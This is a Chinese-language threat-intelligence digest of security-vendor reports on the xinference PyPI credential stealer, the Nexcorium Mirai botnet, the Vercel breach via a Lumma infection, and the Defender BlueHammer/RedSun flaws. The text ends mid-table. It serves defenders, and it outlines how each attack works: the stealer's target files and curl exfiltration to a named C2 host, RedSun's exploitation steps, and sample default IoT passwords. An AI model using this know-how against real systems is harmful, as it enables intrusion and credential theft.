https://www.sentinelone.com/labs/fast16-mystery-shadowbrokers-reference-reveals-high-precision-software-sabotage-5-years-before-stuxnet/

点击阅读原文至ALPHA 9.3

即刻助力威胁研判

阅读原文

跳转微信打开

又又一起AI相关供应链事件：Xinference PyPI (版本 2.6.0–2.6.2)供应链污染报告

Thu, 23 Apr 2026 10:29:00 +0800

原创威胁情报中心 2026-04-23 10:29 北京

广受欢迎的 Python 软件包 xinference (Xorbits Inference) 在 PyPI 上遭到污染，该包主要用于部署大语言模型 (LLM)、语音识别和多模态 AI 模型。恶意版本 2.6.0、2.6.1 和 2.6.2 。

执行摘要

广受欢迎的 Python 软件包 xinference (Xorbits Inference) 在 PyPI 上遭到污染，该包主要用于部署大语言模型 (LLM)、语音识别和多模态 AI 模型。恶意版本 2.6.0、2.6.1 和 2.6.2 被上传，其 __init__.py 文件中包含混淆的恶意软件，在执行 import xinference（或启动 CLI/服务）时会立即触发执行。

恶意负载会执行广泛的侦察并外泄大量敏感数据，包括云凭据（包含针对 AWS 的 IMDSv2 逻辑）、SSH 密钥、Kubernetes 配置、.env 文件、API 令牌、加密货币钱包等，并将数据发送至攻击者控制的 C2 服务器 (hxxps://whereisitat.lucyatemysuperbox.space/)。数据被压缩为 love.tar.gz 后通过 curl 命令发送。

该软件包总下载量约为 68 万次，其 GitHub 仓库 (xorbitsai/inference) 拥有 9.3K 颗星。仅上述三个恶意版本受到影响；在用户报告可疑行为（例如发现搜索密码的 grep 活动）后，维护者已将这些版本从 PyPI 撤回。目前 PyPI 上的最新安全版本为 2.5.0（发布于 2026 年 4 月 12 日至 13 日左右）。

恶意软件中包含“# hacked by teampcp”标记，这与威胁组织 TeamPCP 先前的攻击行为一致。然而，TeamPCP 于 2026 年 4 月 22 日在 X 平台上公开否认参与此事，暗示这可能是模仿者或“假旗”行动。这符合 TeamPCP 在 2026 年发起的更广泛供应链活动，其目标是通过凭据窃取负载攻击高价值的 PyPI/npm 软件包。

针对受影响用户的紧急行动：

如果您安装或导入了 xinference==2.6.0, 2.6.1, 或 2.6.2，请将该主机/环境视为完全被攻破。请立即隔离该环境，轮换所有可从该环境访问的凭据，并审计后续的可疑活动。

Xinference 背景介绍

官方项目：由 XorbitsAI 开发。GitHub 地址：https://github.com/xorbitsai/inference (9.3K stars)。
用途：面向开源 LLM、嵌入模型、图像/音频模型的生产级推理服务器。提供兼容 OpenAI 的 API；支持在云端、本地或笔记本电脑上进行分布式部署。集成了 LangChain、LlamaIndex、Dify 等工具。
PyPI 软件包：xinference —— 作者/维护者：Qin Xuye (xprobe)。许可证：Apache 2.0。
正版发布历史：最新安全版本为 2.5.0（2026 年 4 月）。GitHub 上不存在 2.6.x 的标签或发布版本，表明这些恶意上传绕过了源码仓库。

事件时间线

2025 年 10 月起
与维护者关联的机器人账号 XprobeBot 出现活动；随后被怀疑是未经授权上传 PyPI 包的切入点。
2026 年 4 月初
发布正版 2.5.0 版本。
2026 年 4 月 22 日左右（具体上传时间未公开）
恶意版本 2.6.0–2.6.2 通过被盗的 PyPI 凭据上传至 PyPI（GitHub 端无变动）。XprobeBot 在 UTC 时间约 04:08 提交了一次操作，将 base64 混淆的恶意负载添加到了 __init__.py 中。
2026 年 4 月 22 日（上午）
用户报告可疑行为（例如 GitHub issue #4828 提到发现 grep 扫描密码的操作）。
2026 年 4 月 22 日
维护者撤回了这三个版本。JFrog 安全研究团队发布了详细分析。TeamPCP 在 X 上发布声明否认，称其为模仿行为。
2026 年 4 月 22 日至 23 日
OX Security 等机构发布独立确认报告。目前 PyPI 仅显示 ≤2.5.0 的版本可用。

恶意软件技术分析

该攻击是典型的供应链木马，在导入包时触发（无需单独执行）。

感染向量

恶意代码仅被注入到 xinference/__init__.py 中。
在 import xinference 时，会存在一个经过高度混淆的 base64 编码负载（第一阶段）。
第一阶段会解码并派生一个分离的子 Python 解释器进程（通过带有 stdin 的 subprocess.Popen），运行第二阶段负载。这种方式可以将恶意软件从父进程中隐匿。
大量使用异常处理、抑制 stdout/stderr 以及清理临时文件以实现隐蔽性。

负载行为（第二阶段收集器）

1.主机画像：运行 hostname; pwd; whoami; uname -a; ip addr; ip route 等命令。

2.机密信息收割（广泛的递归搜索，有限的搜索深度）：

SSH 密钥（~/.ssh/id_rsa, /etc/ssh/ssh_host_*_key）。
云凭据：~/.aws/credentials, ~/.aws/config, GCP 配置, Kubernetes (~/.kube/config, service-account tokens)。
AWS 特有行为：获取 IMDSv2 令牌以及 IAM 角色凭据；尝试调用 Secrets Manager (ListSecrets) 和 SSM (DescribeParameters)。（注：由于存在小 bug，限制了完整机密值的提取）。
包管理器令牌：~/.npmrc, ~/.pypirc, Cargo 凭据。
.env 文件、.git-credentials、.gitconfig、Docker config.json。
数据库配置（.pgpass, Redis, MongoDB, LDAP, Postfix）。
加密货币钱包（比特币、以太坊等）。
Shell 历史记录（.bash_history, .zsh_history）、/etc/passwd、/etc/shadow、TLS 密钥（.pem, .key）。
Slack/Discord webhook，JSON/配置文件中的 API 密钥。

3.数据外泄：所有收集的数据写入标准输出 → 压缩为 love.tar.gz → 通过带有自定义头部 X-QT-SR: 14 的 curl --data-binary 发送到 C2。

哈希值（来源于 JFrog）：

恶意 __init__.py: SHA-256 e1e007ce4eab7774785617179d1c01a9381ae83abfd431aae8dba6f82d3ac127
解码后的第一阶段负载: 077d49fa708f498969d7cdffe701eb64675baaa4968ded9bd97a4936dd56c21c
解码后的第二阶段负载: fe17e2ea4012d07d90ecb7793c1b0593a6138d25a9393192263e751660ec3cd0

与此前 TeamPCP 的一些样本不同，该样本没有持久化机制。其重点是快速、一次性地窃取数据。

归因与更广泛背景

TeamPCP 特征：包含明确的“# hacked by teampcp”标记，使用了类似的 base64 + subprocess 技术，以及在 2026 年早期攻击中见过的 C2 外泄模式（如 litellm 1.82.7/1.82.8 和 telnyx 4.87.1/4.87.2）。
否认声明：TeamPCP 的 X 账号 (@pcpcats) 明确否认负有责任，称其为模仿者并表示愿意调查。JFrog 已更新其博客以记录此声明。
可能路径：极有可能是 PyPI 账号被盗 (XprobeBot)，而非 GitHub 被攻破。这与 TeamPCP 使用窃取的 CI/CD 或维护者凭据的历史一致。
活动背景：这是 2026 年针对开发工具、AI 代理和基础设施 SDK 的供应链攻击浪潮的一部分。之前的事件也涉及类似的凭据窃取，目标是高权限环境。

影响

规模：虽然三个恶意版本在线时间较短，但该包总体下载量巨大。在受影响窗口期内自动更新或全新安装的任何 CI/CD 流水线、AI 推理服务器或开发机都处于风险之中。
目标画像：运行自托管推理的 AI/ML 团队（这些环境通常持有高价值云凭据、K8s 令牌和模型服务环境）。
潜在损害：完全的凭据泄露可能导致横向移动、数据外泄、加密货币被盗或勒索软件攻击。AWS 特有的逻辑显示了针对性的后期利用意图。

维护者与社区响应

维护者 (Qin Xuye / XorbitsAI)：在 GitHub 收到 issue 报告后迅速撤回了相关版本。目前 GitHub 仓库尚未发布置顶的公开声明，但暗示已进行内部调查。
JFrog 安全研究：当日发布了全面的技术分析，并将其加入 Xray (XRAY-96896)。
OX Security：独立确认了此事，强调了机器人账号被盗的问题，并提供了修复建议。
PyPI：已移除相关版本；并提供了恶意软件举报链接。

修复与建议

如果您可能受到影响（根据 JFrog/OX 的建议）：

立即隔离受影响的主机。
轮换所有凭据：SSH 密钥、所有云平台 IAM 凭据 (AWS/GCP/Azure)、K8s 令牌、Docker/PyPI/npm 令牌、数据库密码、.env机密、钱包、TLS 密钥等。
审计：CloudTrail、K8s 日志、Shell 历史、认证日志、Git 活动。封禁 C2 域名。
降级：运行 pip install "xinference<=2.5.0"，并在 requirements.txt 或 pyproject.toml 中锁定版本。
长期防护：

在 PyPI、GitHub 和所有维护者账号上启用双重认证 (2FA/MFA)。

使用依赖锁定和 SBOM 工具（如 JFrog Xray，具有漏洞扫描功能的 Dependabot）。

使用能检测这些 IOC（失陷指标）的工具扫描环境。

在 CI/CD 中优先使用锁定的、经过验证的包源或镜像。

针对 PyPI 普通用户的建议：此次事件（以及之前的“Revival Hijack”技术）凸显了已删除/重新注册软件包及维护者账号被盗的风险。

这是一个快速演变的事件。请关注官方 GitHub 仓库 (xorbitsai/inference) 和 PyPI 以获取维护者的进一步更新。组织机构应将此视为 AI 工具供应链安全的警钟。

资料来源

https://research.jfrog.com/post/xinference-compromise/
https://www.ox.security/blog/xinference-allegedly-hacked-by-teampcp-malicious-package-in-pypi/
点击阅读原文至ALPHA 9.1
即刻助力威胁研判

跳转微信打开

Mirai变种Nexcorium深度解析：针对视频监控设备的命令注入漏洞利用与僵尸网络演化分析

Wed, 22 Apr 2026 10:01:00 +0800

原创威胁情报中心 2026-04-22 10:01 北京

奇安信威胁情报中心监测发现，Fortinet FortiGuard Labs与Palo Alto Networks Unit 42联合披露了一起活跃的物联网僵尸网络攻击活动。攻击者利用TBK数字视频录像机（DVR）设备中的命令注入漏洞，部署名为Nexcorium的新型Mirai僵尸网络变种。

事件概述

奇安信威胁情报中心监测发现，Fortinet FortiGuard Labs与Palo Alto Networks Unit 42联合披露了一起活跃的物联网僵尸网络攻击活动。攻击者利用TBK数字视频录像机（DVR）设备中的命令注入漏洞，部署名为Nexcorium的新型Mirai僵尸网络变种。

该恶意软件具备多架构适配能力，可感染ARM、MIPS R3000及x86-64架构的Linux设备。攻击者通过构建四层持久化机制、集成CVE-2017-17215漏洞利用模块及超长暴力破解字典，形成了一套完整的漏洞利用与横向扩展攻击链条。

威胁等级：高（High）

技术分析与威胁归因

初始访问向量：CVE-2024-3721命令注入漏洞

本次攻击的核心入口为CVE-2024-3721（CVSS 3.1评分6.3），这是一个影响TBK DVR-4104和DVR-4216设备的操作系统命令注入漏洞。攻击者通过操纵HTTP请求中的mdb/mdc参数，向设备注入恶意下载器脚本。

漏洞利用流程如下：攻击者构造包含恶意载荷的HTTP请求，诱导设备通过wget或curl命令下载名为"dvr"的下载器脚本。该脚本随后从远程服务器获取前缀为"nexuscorp"的恶意二进制样本，根据目标设备的处理器架构自动适配对应版本。

FortiGuard Labs安全研究员Vincent Li指出，攻击者采用参数传递的方式绕过设备输入验证，直接在设备操作系统层面执行任意命令。这种攻击手法对固件更新滞后、缺乏安全运维的物联网设备尤为有效。

多架构恶意软件架构

Nexcorium并非单一二进制文件，而是一套针对不同处理器架构定制的恶意软件家族。安全分析显示，该变种支持以下目标架构：

目标架构	适用场景
ARM	主流网络摄像机、路由器
MIPS R3000	老旧嵌入式设备、DVR
x86-64	工业控制系统、小型服务器

恶意软件采用经典Mirai架构设计，包含三大核心模块：

1. 看门狗模块（Watchdog）：监控恶意进程状态，检测模拟器或沙箱环境，必要时终止进程以躲避分析
2. 扫描器模块（Scanner）：探测同网段其他物联网设备，尝试Telnet暴力破解
3. 攻击者模块（Attacker）：接收C2指令，执行各类DDoS攻击

配置数据通过XOR编码保护，解码后包含C2域名、攻击命令集和持久化脚本片段。

威胁行为体溯源：Nexus Team

攻击者在多个位置留下身份标识：

受感染设备显示消息："NexusCorp has taken control"

HTTP请求头："X-Hacked-By: Nexus Team – Exploited By Erratic"

恶意样本命名约定："nexuscorp_*"

据此归因分析，该活动由名为Nexus Team的威胁行为体发起，核心成员代号"Erratic"。当前公开信息尚不足以确认该组织与已知APT实体的关联。Nexus Team的具体背景、活动模式和长期目标仍需进一步监测验证。

战术技术演变分析

持久化机制的四层防御体系

Nexcorium展现出远超传统Mirai变种的持久性设计。该恶意软件部署四层独立的持久化机制，确保设备重启或常规清理操作无法彻底移除威胁：

第一层：Init配置持久化

修改/etc/inittab文件，添加恶意进程启动条目，确保系统初始化阶段即运行恶意代码。

第二层：启动脚本注入

篡改/etc/rc.local等启动脚本，将恶意二进制路径写入系统启动流程。

第三层：Systemd服务创建

在/etc/systemd/system/目录下创建伪装成合法服务（如"network-service"）的单元文件，注册为开机自启服务。

第四层：Crontab计划任务

添加周期性计划任务，每隔固定时间间隔重新执行恶意进程，作为前三层持久化的冗余备份。

自防御与反分析能力

Nexcorium集成了多种反检测机制：

自删除功能：初始感染完成后，删除原始二进制文件，增加取证难度

完整性自检：运行时验证自身文件哈希，防止被替换或篡改

环境检测：识别虚拟化环境和沙箱工具特征，规避自动化分析

横向扩展攻击链

恶意软件内置两套横向扩展机制：

嵌入式漏洞利用：集成针对华为HG532路由器的CVE-2017-17215漏洞利用代码。攻击者无需依赖外部漏洞库，即可直接对特定目标发起攻击。

暴力破解字典：内置超过50个默认凭据，覆盖常见物联网设备厂商的出厂设置密码。字典内容包括：

类别	示例凭据
简单数字序列	12345, 123456, 888888
管理员默认账户	admin, Administrator, root
厂商默认密码	hikvision, D-Link, Zte521
复合型弱密码	7ujMko0admin, OxhlwSG8, taZz@23495859

攻击者利用该字典对同网段物联网设备进行持续的Telnet暴力破解尝试。

DDoS攻击能力评估

Nexcorium的最终目的为组建大规模物联网僵尸网络，用于发动分布式拒绝服务攻击。攻击模块支持以下DDoS攻击方式：

UDP Flood：向目标发送大量UDP数据包，耗尽带宽资源

TCP SYN Flood：发送大量半开TCP连接请求，耗尽连接队列

TCP ACK Flood：发送大量带确认标志的TCP数据包

SMTP Flood：针对邮件服务器的连接耗尽攻击

其他变种攻击：包括HTTP Flood、DNS Amplification等技术变体

C2服务器域名为r3brqw3d[.]b0ats[.]top，攻击者通过该域名向受控设备下发攻击指令和目标列表。

MITRE ATT&CK技术映射

技术编号	技术名称	攻击阶段
T1059.004	Unix Shell	命令与控制
T1053.003	Cron计划任务	持久化
T1543.001	创建/修改系统进程	持久化
T1547.001	启动项持久化	持久化
T1070.004	文件删除	防御规避
T1071.001	应用层协议	命令与控制
T1498.001	网络洪水DDoS	影响
T1110.001	暴力破解	横向移动
T1190	利用公开应用漏洞	初始访问

国内影响面评估

结合国内物联网安全现状：

受影响设备范围：TBK DVR设备在国内视频监控市场占有一定份额，主要应用于中小型企业、商业场所和住宅小区。考虑到相关固件更新渠道有限，设备可能仍在使用存在漏洞的旧版本固件。

关联漏洞活跃度：CVE-2024-3721与此前披露的CVE-2017-17215（华为HG532）、CVE-2023-33538（TP-Link多型号路由器）等漏洞形成序列，表明针对物联网设备的漏洞利用已呈现工具化、自动化特征。

暴力破解威胁：Nexcorium内置的密码字典包含"D-Link"、"Zte521"、"Zhongxing"等国内常见设备默认凭据，对国内物联网环境构成直接威胁。

防护建议

针对本次攻击活动，奇安信安全专家建议采取以下防护措施：

漏洞修补层面：优先排查TBK DVR设备（DVR-4104、DVR-4216），确认设备固件版本并及时更新。对于已停止维护的设备，建议更换为持续获得安全更新的新型号。

凭据管理层面：强制变更所有物联网设备的默认密码，禁止使用字典内的弱密码。对于无法修改密码的老旧设备，应限制其网络暴露面，隔离至独立网段并关闭Telnet服务。

网络防御层面：在网络边界部署抗DDoS设备，监控异常物联网设备外连行为。关注C2域名r3brqw3d[.]b0ats[.]top的DNS解析日志，排查内网受控主机。

检测响应层面：部署物联网安全态势感知平台，监控设备行为异常。建立物联网设备资产台账，持续跟踪设备运行状态和安全告警。

关联威胁追踪

Fortinet FortiGuard Labs在同一时期还监测到针对TP-Link TL-WR940N、TL-WR740N、TL-WR841N等生命周期终止（EoL）路由器的CVE-2023-33538漏洞自动化扫描活动。成功利用后部署的恶意软件包含"Condi"字符串引用，具备自我更新和充当Web服务器传播感染的能力。

奇安信威胁情报中心将持续追踪Nexus Team的活动轨迹及其关联的物联网僵尸网络生态，适时更新威胁评估。

参考来源

[1].https://hackread.com/mirai-variant-nexcorium-dvr-devices-ddos-attacks/

[2].https://www.fortinet.com/blog/threat-research/nexcorium-a-mirai-variant-exploiting-dvr-devices

[3].https://unit42.paloaltonetworks.com/mirai-variant-nexcorium/

[4].https://securityaffairs.com/177177/malware/mirai-nexcorium-tbk-dvr.html

点击阅读原文至ALPHA 9.1

即刻助力威胁研判

阅读原文

跳转微信打开

Vercel供应链攻击事件深度分析：第三方AI工具成为企业安全突破口

Tue, 21 Apr 2026 10:04:00 +0800

原创威胁情报中心 2026-04-21 10:04 北京

Vercel内部系统遭未授权访问事件的根源是第三方AI工具Context.ai的一名员工于2026年2月感染Lumma信息窃取器，被窃取了包括Google Workspace在内的多项服务凭据，其中部分凭据关联Vercel管理权限，随后ShinyHunters组织在BreachForums上声称出售相关数据。

事件概述

2026年4月19日，全球主流云部署平台Vercel发布官方安全公告，披露其内部系统遭受未授权访问。初步调查显示，攻击者通过攻陷一个拥有数百名用户的第三方AI工具（后确认为Context.ai）的Google Workspace OAuth应用程序，成功突破Vercel安全边界，获得内部系统访问权限。

这并非一次简单的凭证泄露事件。随着多源情报的交叉验证，此次攻击的真正源头是一名Context.ai员工于2026年2月感染了Lumma信息窃取器。该员工在受感染设备上搜索并下载Roblox游戏作弊程序时，触发了典型的信息窃取器传播链。恶意软件成功窃取了包括Google Workspace、Supabase、Datadog和Authkit在内的多项企业服务凭据，其中部分凭据直接关联Vercel管理权限。

威胁行为组织ShinyHunters随后在BreachForums平台发帖，声称以200万美元出售包含内部数据库、访问密钥、源代码、员工账户、API密钥、NPM令牌和GitHub令牌等数据，并提供约580条员工数据记录作为泄露凭证。Vercel CEO Rauch公开表示攻击者“高度复杂”，并指出攻击者可能利用AI能力加速入侵进程。

攻击链路与技术分析

初始渗透路径

攻击链路呈现典型的“第三方→目标”的供应链攻击模式，具体可分为三个阶段：

第一阶段：信息窃取器感染（2026年2月）

攻击者通过黑产渠道获取Lumma信息窃取器，并通过游戏作弊程序捆绑方式投递。Context.ai一名员工在日常工作设备上搜索并下载Roblox作弊程序时，成功触发感染链。Lumma作为活跃的maas（恶意软件即服务）产品，具备完整的日志回传、屏幕截图、浏览器凭据抓取和加密货币钱包扫描能力。

第二阶段：凭据窃取与武器化

受感染设备上的浏览器凭据被完整提取，包括Google Workspace、Supabase、Datadog和Authkit的服务密钥。攻击者获取了support@context.ai账户的完整访问权限，该账户具备对Vercel管理端点的直接访问能力。

第三阶段：初始访问与权限维持

利用窃取的OAuth访问令牌，攻击者绕过Vercel的正常认证流程，伪装成合法第三方服务访问内部环境。攻击者成功枚举了未被标记为敏感的环境变量，由于Vercel仅对明确标记为"sensitive"的环境变量实施静态加密，非敏感变量处于明文存储状态，攻击者借此实现信息外泄。

战术技术映射

战术阶段	技术编号	技术名称	具体表现
初始访问	T1078.004	有效账户：云账户	利用窃取的Google Workspace OAuth应用凭据访问Vercel内部系统
防御规避	T1550.001	使用替代认证材料：应用访问令牌	使用合法的OAuth访问令牌绕过认证机制，实现隐身访问
凭证访问	T1555.001	凭证来自密码库	信息窃取器从浏览器和系统提取存储凭据
数据外泄	T1041	通过C2通道外泄数据	威胁行为体将窃取数据打包并在黑市出售

环境变量管理的安全盲区

Vercel在此次事件中暴露了一个关键的安全设计缺陷：仅对标记为"sensitive"的环境变量执行服务端静态加密。这一设计假设所有敏感配置都会被开发人员主动标记，但实际上大量包含内部访问密钥、集成token和配置参数的变量处于未保护状态。

攻击者正是利用这一盲区，通过读取未加密的环境变量获取进一步横向移动所需的凭据。这一发现对云原生开发环境的安全架构设计具有重要警示意义。

威胁行为体分析：ShinyHunters组织追踪

组织画像

ShinyHunters是一个以数据窃取和勒索为主要业务模式的黑客组织，长期活跃于BreachForums等地下黑产平台。该组织以大规模数据泄露事件闻名，曾先后泄露Microsoft、Tokopedia、Clubhouse、Nitro PDF等知名企业的用户数据。

已知活动特征：

偏好攻击拥有大量用户数据或高价值知识产权的目标
通常在数据泄露后选择出售或勒索，而非直接公开
具备从供应链上游突破目标的能力，善于识别第三方服务的安全弱点

历史关联活动：

2020年：泄露印度最大在线教育平台Unacademy超过2000万用户数据
2021年：泄露AT&T超过7000万客户信息
2022年：泄露Microsoft必应搜索数据及内部代码
2024-2026年：将攻击重心转向企业服务提供商和SaaS平台

攻击能力评估

基于此次Vercel事件的完整攻击链分析，ShinyHunters具备以下能力：

供应链识别能力：能够系统性地识别目标企业的第三方依赖关系
信息窃取器运用能力：熟练使用Lumma、Raccoon等主流窃密木马实施初始渗透
OAuth滥用技术：深度理解OAuth认证机制，可利用第三方应用劫持目标系统
数据变现渠道：拥有成熟的地下数据销售渠道和买家资源

供应链安全影响评估

第三方AI工具的风险敞口

Context.ai作为一款面向开发者的AI代码辅助工具，具备天然的信任优势。用户通常会赋予该类工具较高的系统权限，以便其访问代码库、集成开发环境和企业协作平台。然而，这种信任模型一旦被攻陷，将直接转化为攻击者的通行证。

奇安信威胁情报中心的监测数据显示，2025年以来针对AI辅助开发工具的攻击事件呈明显上升趋势。攻击者意识到：

AI工具通常需要持久化访问权限以提供流畅的使用体验
开发人员倾向于在这类工具中存储长期有效的API密钥
AI工具的更新频率高，安全审计往往滞后于功能迭代

开发者安全的系统性风险

此次事件揭示了现代开发工作流中的多个安全盲区：

个人设备安全与企业文化冲突：开发人员使用个人设备访问企业资源是常态，但个人设备的安全防护水平远低于企业托管设备。当个人设备感染信息窃取器时，企业凭据的泄露几乎不可避免。

第三方信任链的脆弱性：现代软件开发高度依赖第三方服务，每个第三方服务都构成潜在的攻击面。攻击者无需直接攻陷目标，只需突破其供应链中最薄弱的环节。

OAuth授权的过度发放：开发人员为便捷性往往授予第三方应用超出必要范围的权限。当第三方应用被攻陷时，过度授权的OAuth令牌将成为攻击者的利器。

影响范围评估

影响维度	具体情况
直接受影响客户	有限数量，Vercel已直接通知
数据泄露范围	非敏感环境变量、内部部署配置、API密钥、员工记录（约580条）
服务可用性	Vercel核心服务保持正常运行
供应链下游影响	Next.js、Turbopack等开源项目经确认未受影响

失陷指标（IOC）

对Vercel官方发布的IOC进行了多源验证，确认以下指标可用于安全排查：

OAuth应用标识符

OAuth App ID: 110671459871-30f1spbu0hptbs60cb4vsmv79i7bbvqj.apps.googleusercontent.com

验证状态：该OAuth应用已被URLhaus标记为恶意，当前处于黑名单状态。建议Google Workspace管理员立即排查是否批准过此应用的授权请求。

排查建议：

登录Google Workspace管理控制台
进入“安全性” → “API权限” → “已授权的应用”
搜索上述App ID，若存在授权记录，立即撤销并检查账户活动日志
检查是否有异常的资源访问行为

威胁行为体关联指标

指标类型	描述	关联置信度
泄露数据样本	BreachForums上约580条员工记录	高
勒索要价	200万美元	高
数据打包特征	数据库、源代码、API密钥、NPM/GitHub token	高
初始感染载体	Lumma信息窃取器 + Roblox作弊程序	高

防御建议

针对Vercel客户

立即轮换未标记为敏感的API密钥和令牌：特别是与GitHub、NPM、内部服务相关的凭据
启用环境变量敏感标记功能：将所有包含访问密钥、token和内部配置的变量标记为敏感
审计活动日志：检查近期是否有异常的OAuth应用访问或环境变量读取行为
审查第三方应用授权：清理所有非必要且不熟悉的OAuth应用授权

针对企业开发者

个人设备安全加固：在处理企业资源的个人设备上启用企业级端点防护
避免在工作设备上下载非官方软件：特别是不明来源的游戏辅助、破解工具
实施MFA和最小权限原则：限制单一账户的权限范围，降低凭据泄露的破坏半径
定期轮换OAuth令牌：建立自动化的凭据轮换机制

针对SaaS和云服务提供商

默认加密所有环境变量：改变基于标记的加密策略，实施默认加密
第三方应用白名单机制：对OAuth应用实施严格的审核和授权流程
供应链安全审计：定期评估第三方服务的安全态势，将供应链风险纳入整体风险管理框架

总结

此次Vercel供应链攻击事件是2026年以来最具代表性的供应链攻陷案例之一。从攻击链完整性来看，事件经历了“信息窃取器感染→凭据武器化→OAuth滥用→数据外泄”的完整杀伤链，每个环节都利用了现代开发流程中的典型安全盲区。

关键警示：

信息窃取器仍然是企业供应链最有效的突破口。攻击者无需使用高级APT技术，只需利用社交工程和恶意软件即可获取高价值企业凭据。
OAuth生态系统的信任模型存在根本性缺陷。当第三方应用被攻陷时，其持有的令牌将自动成为攻击者的通行证。
云平台的默认安全配置不足以应对有针对性的供应链攻击。企业需要建立超越平台默认保护机制的安全能力。

奇安信威胁情报中心将持续关注ShinyHunters组织的活动动态，并监控该组织是否将泄露数据进一步扩散或用于二次攻击。建议所有使用Vercel平台的企业立即执行上述防御措施，并保持对最新威胁情报的关注。

参考来源

阅读原文

跳转微信打开

微软Defender零日漏洞深度分析：从BlueHammer到RedSun，安全工具的攻防博弈

Mon, 20 Apr 2026 14:31:00 +0800

原创威胁情报中心 2026-04-20 14:31 北京

近日微软在Patch Tuesday例行更新中修复了Microsoft Defender反恶意软件平台中的一个高危零日漏洞BlueHammer，该漏洞技术细节在微软官方修复发布前即被公开披露，攻击者可能已掌握漏洞利用代码，随后安全研究员公开了针对同一安全平台的另一未修补漏洞RedSun

事件概述

2026年4月，微软在Patch Tuesday例行更新中修复了Microsoft Defender反恶意软件平台中的一个高危零日漏洞（CVE-2026-33825，又称BlueHammer）。该漏洞源于平台内访问控制粒度不足（CWE-1220），允许具备基本本地访问权限的攻击者将权限提升至最高SYSTEM级别。

值得高度关注的是，该漏洞的技术细节在微软官方修复发布前即被公开披露，攻击者可能已掌握漏洞利用代码。更为严峻的是，安全研究员Chaotic Eclipse于4月16日公开了针对同一安全平台的另一未修补漏洞RedSun，该漏洞利用Defender对云标签文件的处理逻辑缺陷，将防御工具本身转化为攻击链的一环。这两起连续披露事件反映出安全研究社区与厂商之间的信任危机，同时也预示着针对终端安全基础设施的攻击技术正在向更高阶的形态演进。

漏洞技术分析

BlueHammer漏洞（CVE-2026-33825）

CVE-2026-33825 是Microsoft Defender反恶意软件平台中的一个本地权限提升漏洞。攻击者利用平台内部访问控制机制的粒度不足，通过用户态二进制文件（MsMpEng.exe）与内核态驱动之间的权限边界混淆，实现从低权限用户到SYSTEM级别权限的跨越。

根据微软CVSS 3.1评分体系，该漏洞获得7.8分（高危），攻击特征如下：

评估维度	配置值	风险解读
攻击向量	Local（本地）	攻击者需已获得目标系统 foothold
攻击复杂度	Low（低）	漏洞利用路径明确，稳定性高
权限要求	Low（低）	标准用户账户即可触发
用户交互	None（无需）	漏洞利用可静默执行

该漏洞的技术根因指向CWE-1220（访问控制粒度不足），这意味着平台在设计层面对权限边界的控制存在结构性缺陷，而非单一的实现错误。从攻击链视角分析，此类漏洞通常作为APT攻击的权限提升（Privilege Escalation）环节使用，位于初始入侵之后、横向移动之前。

RedSun漏洞：安全工具的双重属性滥用

RedSun漏洞代表了更高级的攻击思路：不再寻找传统意义上的代码执行缺陷，而是滥用安全产品的正常功能逻辑，将其转化为攻击向量。

该漏洞的利用原理如下：当带有"云标签"（Cloud Tags）标记的文件被Defender检测并隔离后，平台可能触发文件"恢复"机制，将文件写回原始路径。攻击者正是利用这一合法行为的时序竞争条件，通过以下步骤实现权限提升：

诱饵构造：创建携带特定云标签的恶意文件（如伪装为EICAR测试字符串的可执行文件）
虚假同步根注册：利用Cloud Files API注册虚假的同步根目录，使恶意文件获得云管理特征
竞争条件触发：通过oplock机制协调文件系统操作时序，诱导Defender执行异常恢复行为
路径重定向：利用重解析点（Reparse Point）将文件操作重定向至System32等特权目录
权限获取：最终实现将恶意可执行文件写入高权限位置，以SYSTEM上下文执行

这种攻击方式的高明之处在于：它组合了多个合法的Windows子系统（NT文件操作、卷影复制服务、Cloud Files API、oplock机制、重解析点），单一行为均难以被判定为恶意，但串联使用即可形成完整的攻击链。

威胁行为体归因分析

漏洞发现者追踪

研究者	身份特征	关联动作
Zen Dodd	独立安全研究员	联合报告BlueHammer漏洞
Yuanpei XU	独立安全研究员	联合报告BlueHammer漏洞
Chaotic Eclipse（Nightmare-Eclipse）	独立安全研究员	公开RedSun漏洞及完整PoC

Chaotic Eclipse的研究者身份值得特别关注。根据开源情报分析，该研究者长期关注微软安全产品的漏洞挖掘，其公开RedSun漏洞的动机被普遍解读为对BlueHammer补丁处理方式的不满——BlueHammer漏洞细节在微软修复前被公开披露，这可能导致了厂商与研究者之间的信任破裂。

APT组织利用可能性评估

从威胁行为体归因视角分析，CVE-2026-33825类漏洞对高级持续性威胁（APT）组织具有显著战略价值：

利用价值评估：

微软Defender作为Windows内置安全组件，部署量覆盖全球数亿终端

漏洞利用门槛低（本地访问即可，无需用户交互）

获取SYSTEM权限后可建立持久化据点，完全接管目标主机

可与供应链攻击、初始访问向量形成高效攻击链

APT组织潜在利用路径：在APT攻击杀伤链模型中，该漏洞位于权限提升和持久化环节。攻击者通常通过鱼叉式钓鱼（Spear Phishing）或供应链攻陷（Supply Chain Compromise）获取初始低权限访问，随后利用此类漏洞提升至SYSTEM权限，为后续的横向移动和数据外泄奠定基础。

关联威胁活动预警：考虑到BlueHammer利用代码已公开、RedSun PoC已发布，高能力威胁行为体（包括APT组织）在未来30天内将该漏洞集成至攻击工具库的概率为高。

战术技术演变分析（MITRE ATT&CK框架映射）

本章节将BlueHammer和RedSun漏洞的攻击战术映射至MITRE ATT&CK v14框架，为安全团队的检测与响应提供技术参照。

BlueHammer攻击链ATT&CK映射

攻击阶段	ATT&CK战术	技术ID	技术描述
初始访问	通过漏洞组合实现	T1078.004	利用合法凭证或低权限账户
权限提升	利用漏洞提权	T1068	利用软件漏洞获取更高权限
权限提升	滥用权限控制机制	T1548	绕过访问控制限制
持久化	创建账户	T1136.001	创建本地管理员账户

RedSun攻击链ATT&CK映射

攻击阶段	ATT&CK战术	技术ID	技术描述
权限提升	利用云标签处理缺陷	T1068	利用文件系统交互逻辑缺陷
权限提升	利用竞争条件	T1499.004	滥用系统功能的时序特性
持久化	写入特权位置	T1544	替换受保护的系统文件

关键检测点

针对RedSun攻击链，防御者应重点监控以下异常行为组合：

Cloud Files API异常调用：非同步提供者角色却调用Cloud Files API

卷影复制设备枚举：用户态代码对\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy 等路径的访问

临时目录重解析点创建：在用户临时目录创建重解析点后尝试替换系统文件

文件恢复行为异常：Defender执行非预期的文件恢复操作

国内影响评估

暴露面分析

微软Defender作为Windows 10/11操作系统的内置安全组件，其默认启用特性使其成为国内数量最庞大的终端安全基础设施之一。

高风险场景识别：

场景	风险等级	说明
企业内网终端	高	攻击者可通过横向移动抵达高价值资产
